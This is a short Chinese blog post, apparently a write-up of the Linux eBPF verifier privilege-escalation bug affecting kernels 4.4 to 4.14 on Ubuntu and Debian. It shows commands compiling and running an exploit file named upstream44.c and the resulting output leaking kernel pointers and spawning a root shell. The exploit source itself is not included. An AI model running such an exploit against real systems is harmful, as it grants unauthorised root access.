该漏洞存在于 Linux 内核带有的 eBPF bpf(2) 系统调用中, 当用户提供恶意 BPF 程序使 eBPF 验证器模块产生计算错误, 导致任意内存读写问题.
kernel 4.14 - 4.4
Only Ubuntu / Debian
$ gcc -o exp upstream44.c
$ chmod 777 exp
$ ./exp
task_struct = ffff8800789c1540
uidptr = fff88007c0cb6c4
spawning root shell
# whoami
root
- By:X1r0z[exp10it.cn]
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论